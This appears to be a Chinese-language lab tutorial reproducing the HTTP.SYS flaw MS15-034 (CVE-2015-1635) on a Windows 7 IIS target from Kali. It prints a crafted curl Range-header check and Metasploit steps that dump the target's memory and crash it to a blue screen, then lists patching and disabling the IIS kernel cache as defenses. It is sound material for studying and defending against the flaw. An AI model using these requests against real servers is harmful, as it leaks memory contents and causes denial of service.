CVE-2015-1635/MS15-034远程代码执行漏洞

目录

一、CVE-2015-1635/MS15-034

1、漏洞背景

2、影响版本

二、实验环境

三、漏洞复现

1、在win 7上开启iis服务

2、使用kali验证靶机漏洞是否存在

3、使用MSF框架自带的攻击模块对靶机进行渗透

利用ms15-034漏洞读取靶机内存数据

利用ms15-034漏洞进行ddos攻击

四、防御措施


一、CVE-2015-1635/MS15-034

1、漏洞背景

在4月的补丁日,微软通过标记为“高危”的MS15-034补丁,修复了HTTP.SYS中一处远程代码漏洞CVE-2015-1635。据微软公告(https://technet.microsoft.com/en-us/library/security/MS15-034)所称,当存在该漏洞的HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行。

这是对于服务器系统影响不小的安全漏洞,任何安装了微软IIS 6.0以上的的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响。

从微软的公告致谢来看,这个漏洞是由“Citrix Security Response Team”(美国思杰公司的安全响应团队)发现,从网上公开的信息来看,Citrix公司是一家从事云计算虚拟化、虚拟桌面和远程接入技术领域的高科技企业。这也引发了Twitter上很多关于该漏洞是否是由针对Citrix公司的APT攻击中发现的疑问,而就在微软发布补丁的不到12个小时内,便有匿名用户在Pastebin网站上贴出了针对这个漏洞可用的概念验证攻击代码,似乎也印证了这一点。

2、影响版本

IIS 7.0以上的Windows 7/8/8.1和Windows Server 2008 R2/Server 2012/Server 2012 R2等操作系统。

二、实验环境

攻击机:kali-2022 版

靶机:win 7 x64 专业版

注:实验环境均由VMware Workstation Pro搭建而成,镜像可自行百度,官网下载,不是在官网下载的请选择普通下载,以免下载“全家桶”或下载到捆绑病毒使电脑中毒,攻击机与靶机需在同一网段且互相ping通

三、漏洞复现

1、在win 7上开启iis服务

控制面板>程序>程序和功能>打开或关闭防火墙功能>勾选上Web管理工具和万维网服务,然后确定即可开启iis服务

CVE-2015-1635/MS15-034远程代码执行漏洞_第1张图片

我们访问一下

http://127.0.0.1/

CVE-2015-1635/MS15-034远程代码执行漏洞_第2张图片

如上所示证明开启了iis服务

2、使用kali验证靶机漏洞是否存在

curl -v 192.168.50.205 -H "Host:irrelevant" -H "Range:bytes=0-18446744073709551615"

CVE-2015-1635/MS15-034远程代码执行漏洞_第3张图片

返回如上信息证明靶机存在此漏洞

3、使用MSF框架自带的攻击模块对靶机进行渗透

search ms15-034 #查看可使用模块

这里存在两个可利用的模块:一个是对靶机进行ddos攻击的,一个是获取靶机内存数据的(对应序号分别为0和1)

利用ms15-034漏洞读取靶机内存数据

use 1 #或(use auxiliary/scanner/http/ms15_034_http_sys_memory_dump)使用该模块

show options #查询所需配置

set rhosts 192.168.50.205 #设置靶机IP

run #运行

CVE-2015-1635/MS15-034远程代码执行漏洞_第4张图片

返回上图说明靶机内存数据获取成功

利用ms15-034漏洞进行ddos攻击

同样借助MSF框架:

use 0

show options

set rhosts 192.168.50.205

run

攻击开始后,靶机瞬间蓝屏然后自动重启

CVE-2015-1635/MS15-034远程代码执行漏洞_第5张图片

CVE-2015-1635/MS15-034远程代码执行漏洞_第6张图片

四、防御措施

1.打补丁

2.临时禁用IIS内核缓存

你可能感兴趣的:(microsoft)